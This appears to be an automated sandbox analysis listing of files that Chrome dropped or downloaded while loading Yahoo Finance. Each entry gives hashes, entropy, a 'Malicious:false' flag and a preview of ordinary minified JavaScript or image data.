                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){function fe(d){var f={A1S:{log:!0,key:"_a1s"},B:{log:!1},BX:{log:!0,key:"bx"},WV:{log:!0,key:"_wv"},TT:{log:!1},D:{log:!1},_ga:{log:!0,key:"_ga"},yx:{log:!0,key:"_yx"},rxx:{log:!0,key:"_rx"},UNAUTHID:{log:!0,key:"aol_unauth"},_utd:{log:!0,key:"aol_utd",filter:function(e){e=e.match(/((?:\||^))gd#[^\|]+/g)[0].split("#")[1];return 24!==e.length&&console.warn("_utd value may be malformed"),e}},RSP_COOKIE:{log:!0,key:"aol_rsp",filter:function(e){e=e.match(/(?:(\&|^))sn=[^\&]+/g)[0].split("=")[1];return 24!==e.length&&console.warn("RSP_COOKIE value may be malformed"),e}},GUC:{log:!0,key:"_guc"},OTH:{log:!0,key:"_li",filter:function(){return"1"}}},m={},e=(this.getCookieByName=function(e){return m[e]},this.setRxx=function(e){var s=-2,t=(document.domain||"").split("."),l=t.length;function c(e){return"."+t.slice(e).join(".")}function u(){var e=c(s),t="rxx",n=m[t],i=(n||(i=(new Date).getTime()-14383872e5,n=parseInt(Math.random().toString().substring(2)).toString(36)+"."+i.toString(36)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (3672)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3673
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.35805986047029
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:l08TTz1jjnWAGdxS1TwQRO0XDPxOnsK+VSfQwIfm:1vz5WvSz78CSfQwIfm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6218820855C260587D522A546E013714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:6182CAF0DCA4CC815E1AB6CDD13D3C797E8AB7AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:43EEEA5939136413D89289CF59308E54BF8D52EE6AA622C2FA744C85E78D1AA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CC3A70588EE6F827B1503E239A00A94AB6F02FC27EF8E3A0777B0F1F62288A45DC948F2BDC42935E6844208834B2A4FD408BF073D2E914D61D7295CB1C9147BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as p,e as q,d as z,f as A,i as _,q as h,U as g,k,I as G,c as P,b as T,j as U,l as F,u as H,g as J,a as K,P as Q,t as R,h as V,a6 as W}from"./scheduler.Dr9AAxFe.js";import{S as X,i as Y,t as d,g as B,a as m,e as N,c as Z,b as E,m as x,d as $}from"./index.DCSmZEjO.js";import{B as ee}from"./Button.DpT5MMuf.js";import{C as te}from"./close.C3ug6nNR.js";import{t as D}from"./commonUtil.CI22_Irn.js";function y(c){let e,n,t;const s=c[13].default,f=P(s,c,c[12],null),u=f||ne();let o=c[2]&&I(c);return{c(){e=q("section"),u&&u.c(),n=T(),o&&o.c(),this.h()},l(a){e=z(a,"SECTION",{class:!0});var r=A(e);u&&u.l(r),n=U(r),o&&o.l(r),r.forEach(_),this.h()},h(){h(e,"class","dialog-content yf-cex3h9"),g(e,"padded",c[4])},m(a,r){k(a,e,r),u&&u.m(e,null),F(e,n),o&&o.m(e,null),t=!0},p(a,r){f&&f.p&&(!t||r&4096)&&H(f,s,a,a[12],t?K(s,a[12],r,null):J(a[12]),null),a[2]?o?(o.p(a,r),r&4&&d(o,1)):(o=I(a),o.c(),d(o,1),o.m(e,null)):o&&(B(),m(o,1,1,()=>{o=null}),N()),(!t||r&16)&&g(e,"padded",a[4])},i(a){t||(d(u,a),d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (830)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):831
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.216636352209242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:JFCFnXfGKXLqdtysALYk4voFbqwuAd55VuWj:JFknXf/SYsALYhvkbum55wWj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:020FE204C0DB6FC9CDFBFEB00EF5317C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:083E74BF6D49F33EB3AB6CD9F9712D16E94FCC04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1D5F841B1E6B5323F77797CF601B1679D113BBC1B5BF1B74906E5E6B0347E60
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EC51319B9E44655F5F5B7C961637E4B407AC32A530F70EB0FC812C96507EB0C73C14BA2608F3ABEC1EB277079A763E0C0B6D820AD8BCBD5FBA224BC542198E47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/nodes/1.oDKH-Qqj.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as x,e as u,t as h,b as S,d,f as v,h as b,i as m,j,k as _,l as g,m as E,n as $,o as k}from"../chunks/scheduler.Dr9AAxFe.js";import{S as q,i as y}from"../chunks/index.DCSmZEjO.js";import{p as C}from"../chunks/stores.DPDRpTFd.js";function H(i){var f;let t,s=i[0].status+"",r,o,n,p=((f=i[0].error)==null?void 0:f.message)+"",c;return{c(){t=u("h1"),r=h(s),o=S(),n=u("p"),c=h(p)},l(e){t=d(e,"H1",{});var a=v(t);r=b(a,s),a.forEach(m),o=j(e),n=d(e,"P",{});var l=v(n);c=b(l,p),l.forEach(m)},m(e,a){_(e,t,a),g(t,r),_(e,o,a),_(e,n,a),g(n,c)},p(e,[a]){var l;a&1&&s!==(s=e[0].status+"")&&E(r,s),a&1&&p!==(p=((l=e[0].error)==null?void 0:l.message)+"")&&E(c,p)},i:$,o:$,d(e){e&&(m(t),m(o),m(n))}}}function P(i,t,s){let r;return k(i,C,o=>s(0,r=o)),[r]}class B extends q{constructor(t){super(),y(this,t,P,H,x,{})}}export{B as component};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13914), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13914
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.258346764050396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3x7q46AEQ42tWCnPfQefR7GDD6Ub45XBB8qQMmF88zzAqSeXHr4baLHDW4XbXZ34:B7q46P5gp7GD9b45s3kjeXr4UjW4XbXm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:69831B2F7B26BC6DD6321C8DCDE85968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:BE0D47A076698915D827447B210BFFAB24AF3BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ED22526F9ADCDD172C698E0DFC9FA3EE064A96A27BED3335931C4B2BDDF4EEE9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:2804AEA752858CBE2020FE5977B1BD4F064026D758ACF19176498F70DB4026604DFFABC9350F61E1022AD405BD46C01080B4F65E579AF6BA1E2C326E356771B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/wf/wf-lightbox-1.10.6-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-lightbox",[],t):"object"==typeof exports?exports["wafer-lightbox"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-lightbox"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(o[n])return o[n].exports;var l=o[n]={i:n,l:!1,exports:{}};return e[n].call(l.exports,l,l.exports,t),l.l=!0,l.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,n){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function n(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurabl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1411)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.325416954924045
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:bNILfPOPCxW74s3VR/fAe3i+WdQxybVHsZkkzGp1S6fD7ZfAbJssngjbxBFS4sW:bN4fGsq3VRnAe3i+WuxQpayH77yus4Pd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:06DB46AD67C17DBB84A850A26B8BF73F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DE1616F58D1111283FABDB74FEC47008A6FAEF2B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DC560454536BDB2A940BA35DB87DB1D5E9D192E5131412AB3498EE299D72C648
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4D46FF24D90ECCD648E2E803E7750FD6F4F41C895A1C0E4CB4905E1E1F296C4719FF44514E38E8A78A49A9B3A3E0301A9AC2B56FA7099C098D80BEF956E14847
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadQuote.D9BAmXuK.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{d as Q}from"./commonUtil.CI22_Irn.js";import{l as d,f as w}from"./logUtil.hOue7iAU.js";const g=30;async function k(c,{symbols:r,fields:n,silent:f=!1,imgLabels:S="logoUrl",imgHeights:q="50",imgWidths:A="50"}){if(!r||!n){const e=new Error("Bad request for loadQuote");return d(c,{fields:n,silent:f,symbols:r},{data:e,perfLabel:"loadQuote"}),Promise.reject(e)}const[y]=await Q(["quote"],c),s=[],h=[],b=Array.isArray(r)?Array.from(new Set(r)):[r],l={};for(const e of b){const o=y.getQuote(e);if(o){const m={fromCurrency:!0,fromExchange:!0,headSymbolAsString:!0,toCurrency:!0,toExchange:!0,ticker:!0,sparkline:!0,underlyingExchangeSymbol:!0,underlyingSymbol:!0},p=n.filter(u=>!m[u]&&!o[u]);if(h.push(...p),p.length===0){l[e]=o;continue}}else h.push(...n);s.push(e)}if(s.length===0)return l;try{const e=Array.from(new Set(h)).join(","),o=[],m=Math.ceil(s.length/g);for(let t=0;t<m;t++){const a=Math.min((t+1)*g,s.length),i=s.slice(t*g,a);o.push(w(c,{crumb:!0,pathname:"/v7/finance/quote",perfLabel:"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (16526)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5030866862226935
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:lCtLGbKsFdBSo6PcfPkRgyjgRKJMxFTLanEm02TJVD1XPwyj3k:lULGOsFdBackRgUgRKEFTAE12Pvj3k
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4DD3B857C7E86CC21B5A4C293F0EABC5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:63A6146C1DED95A9E1B2EB6A594766C610DD6A75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E7EB1F4284E8442F254018FE89A6E42B51A471C6D4ECC7B2C5919DCAFACB9B92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:ECC05D8E7EEFCEB63B5D68012ACFE709844A1FBFB03AB346DC41829A23A23F8A6C626E9BECB6373F9E82771DF2CD67AF536FF4770A1F613ED8899168EB045BED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["./ErrorMsg.DF_ReW41.js","./scheduler.Dr9AAxFe.js","./index.DCSmZEjO.js","./error_outline.CkdKfkE_.js","./Icon.BSWt_jx8.js","./spread.CgU5AtxT.js","../assets/Icon.DgFg0-NP.css","./commonUtil.CI22_Irn.js","./stores.DPDRpTFd.js","./43.CtYdpA_T.js","./control.CYgJF_JY.js","../assets/ErrorMsg.CmzKsgiD.css","./ChatSupport.DBpKg4b1.js","./globals.D0QH3NT1.js"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{_ as K}from"./preload-helper.D6kgxu3v.js";import{e as L,d as N,aT as X,j as J,aU as ie,aV as Q,aW as G,r as y,aX as oe,_ as le,aj as ue,F as Y,aY as ce,aZ as me,a8 as de}from"./commonUtil.CI22_Irn.js";import{f as M,l as O,b as ae}from"./logUtil.hOue7iAU.js";import{l as fe,b as pe,c as ge,a as Z}from"./headerUtil.D8XWvN0j.js";import{w as he,x as be,r as x}from"./plusUtil.B2ndRR6_.js";import{l as we}from"./loadPortfolios.CToUELqx.js";import{d as Se}from"./index.rV6zwFgL.js";import{a as Pe}from"./ads.DhuB_mth.js";async function _e(e,{silent:t=!1}){const[a,[i]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 41 x 330, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2986
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.595859761626018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:ki3VLqI5DRFJEmlXv+2KpDRFZdtseQURsd1dA1h6wBxANNh4E6LEZU3KgCDj2fbT:7LFDXlXWzzsZj/dEBxab46SKgC+jCMNn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C2396079060A7028FA898A73B72AA592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:81EE85D797FF9C40A19B15E4130D7F677011C5A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1A166EBD6C8872D71EFCEFB4765DB513014B732E1886525C5F2D5DED87071451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AC8F6403C6F5CD0ACEB315C0EE48DA6A3540D4C012A15A754EFEFE069CB33B6AA3124C3C5C7746185CE4A3EED7898A1AE07C170501AC78CAC16290084255CCA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...)...J............jPLTE...IIY..........#)E..\el.")...\dk!w..j.....j..j.'/;.:.....;.....i.....i....#+1$,4.j..............i.$+3....;..:.#*2.i..;.#+2.;.....j.....j..j..m..i........l..:....#+2#+1\dj.#).j..k..k.#(/.l.&-5.;..n..n....**7....j..:.....j.....;.....k..l.#*2.i..:.#*1.:..i..i........i........;........;.$+1....=...."%,#,5.j..i........j.....j.....j.....j...........n....#+1[dj.").:.$+1....:.$*2.:..j.......#+2.......j..;.$*2.j.....k..;....$+3.l...._fk`gn...ddm$$..A....[mm.l..i.....j....\cj................j..k..l..k..l..j.$*2.j..:.....j.#+2.;.#+1...$+1.;..k..j..:.#+4.;.$+2.i..<.%.3.=..@........j.....l.....i..C..w..i.....:.#*1[cj."(....Z.N....tRNS....*.........x.........@/....j./...eW'...V#"......}}lbR/+'#...........w8&...........ji^QPJ($$............N;/..................{xtqpoaZN?0%!............|dZZI<2!.........~{tng`^KGB972...ePG33....k....(IDATh...W.0....).Q..O.pC.......((....,...{...{o.V..Lz'......D}~..%m?$M..{m....u...=W.d.u8.....3**(....bT@.b..x...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.80666143611544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:JSA/FAJu6L2vWclOLNZFrZYTMQ4LNZFrSlKwM313kqugRF/FA4/FIev:vU2vWvLNZFrgMfLNZFr7wg1Ru+64Njv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B1FFAED8B9668B395F784DD975A882AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:85F4BA4EB4ED11CC6BE25F67175519E9D2B8DA3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BF3179BEB53AAF37783F1D610493AFDC2285B0E159F25477E9C0A78B38FE9364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3AF3264DBF5061D81C5A40DB797B517639A7B104F936B59D0CFB8084705319E7A9DB84238061F1F72AE691D521D8E977784C3238FCA7183B3F59598293661E61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{H as e,R as o}from"./control.CYgJF_JY.js";function i(r,t){throw new e(r,t)}function c(r,t){throw new o(r,t.toString())}new TextEncoder;export{i as e,c as r};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3014
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.749488350246622
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:q04dB+8cNaIhr3pe2ox9ojOJVhiygbuYTyaeFJxCLggH+8LOMqOt9/evtuv:qTB+8cbhr0Z9EeLiByFF3CLggeW7hEty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:570DB8310832B88C50AB986A819A0764
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D4ABD6F12354FB40DF26C3AA51A1DE62998D2E12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A8F6FFEA983F46E8F2B83ABE8561938C10DE36484CA79CA5432683F4C2634EA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A772DD550924C8ED53C12286A3A7572694110C47645A13904184E5591AC35DD0442A239F7D6A4D918FC1717E7A7F90F4E704B5CCE2A7CFC461B6EB882067EF43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiq............. ....\.................... .....4..."...)...F.................m..H..~...........x..O.....e...O@.......$.|.....$...................Y.......C......b.....zYV...........).1....,../.......(.3.9".5..9.,.?(.D.*.....#.....D-......&.!......."..].=.I3.M9....J.....'...,....."..!..7.. ...O."..f...8...}.(..+....1........)..*...7..v........."..%......T.?&....[7.....n.8.~=.7*....%.....%..S>..?..=.@4......."...........i\..............2 ./$..E........FFD.o9.................f............"....C:...7...2...J1.,!.e6.6.#.....;WWW.........t\6R:.....~......|.,..)..YA.XA.E9..k.QJ>>=..R.....vE1.....s.ni.,....xr..9.D;.t>.W>.*..Zklk1(....{U..~.O.+..f..(._..~!.!...._|B,...NE.:...^/(e...a\.qF....H<.2%.G<.8...Z.."eF..b.t......Ud<....tRNS..............'.2...=v....{K....h..o.8..\.......^....................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12779)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):12780
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.522986307274393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:jtquREsbt7npSqo7lqfsegJdlF//isjdNc10VIYUh2bJByAjRhNn:jFxLQPB//lBHjcQItolY2TN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:83ABB09B36CFFE0B6E2BC8DA0ABD92E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C05E4602E77B87E10FAE21350F7413CBDA21F60F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8E8C219AE2CA88342CDAF758752219FD0C4D1F0C0FCDF00A5DE4AF1AF6C72B70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:6BD18B87703AD9196AC3C6607DEAFC8E5E32CC8EC27ECFFFF69818846B23A23F809A738304CA7F97F3923F03E0D33560B2CEF3D22B94E5F12C4679FB93C20631
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Select.N-a6-Z3E.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Ee,c as He,A as q,e as G,b as K,d as W,f as P,j as O,i as I,B as Se,U as S,k as R,l as B,u as Re,g as Ue,a as Be,Y as J,T as De,q as N,_ as D,G as Ce,v as Xe,I as Ze,P as Ne,t as we,p as ke,h as xe,m as pe,C as ze}from"./scheduler.Dr9AAxFe.js";import{S as Ge,i as We,t as _,g as qe,a as M,e as Te,c as ee,b as te,m as le,d as ie}from"./index.DCSmZEjO.js";import{g as Pe,a as Ie}from"./spread.CgU5AtxT.js";import{C as $e}from"./check.21reEWCG.js";import{I as Ke}from"./Icon.BSWt_jx8.js";import{A as et}from"./a11y-dialog.esm.BnYZCIGX.js";import{B as tt}from"./Button.DpT5MMuf.js";import{C as _e}from"./expand_more.DscV4c36.js";import{b as Le}from"./i13nUtil.C-uBpR7k.js";import{U as lt}from"./commonUtil.CI22_Irn.js";import{a as it}from"./43.CtYdpA_T.js";function Ve(i){let e,l;return e=new Ke({props:{icon:$e,className:"check",size:i[6],type:"action"}}),{c(){ee(e.$$.fragment)},l(a){te(e.$$.fragment,a)},m(a,u){le(e,a,u),l=!0},p(a,u){const c={};u&64&&(c.size=a[6]),e.$set(c)},i(a){l||(_(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (7769)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):7770
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4331492673298385
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:KTMHB7+FbAiuespuhrnCrDrGPnY/5Gw2htEsjrYrR0v3z3v:KTMB6bAMsp+rnCrDc65Gw2h+sjrYrRkz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:283BE04D957F14C053AC30270B7E7BBF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8F92AF871BD2F09590E9376D9F2619E72198EFD1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:878B8FDFADDC699421DD7446205FB298B759AC531A37873FCEDF463DA6DBA2EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3182149EFB5DF8C997237472F9D9F1B6AA284142F6425EBF24F69EA102CE4EFB084EF2283073890364BFF66292F41102823739B7A85EFE4AB1E1C1ED868D5D6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
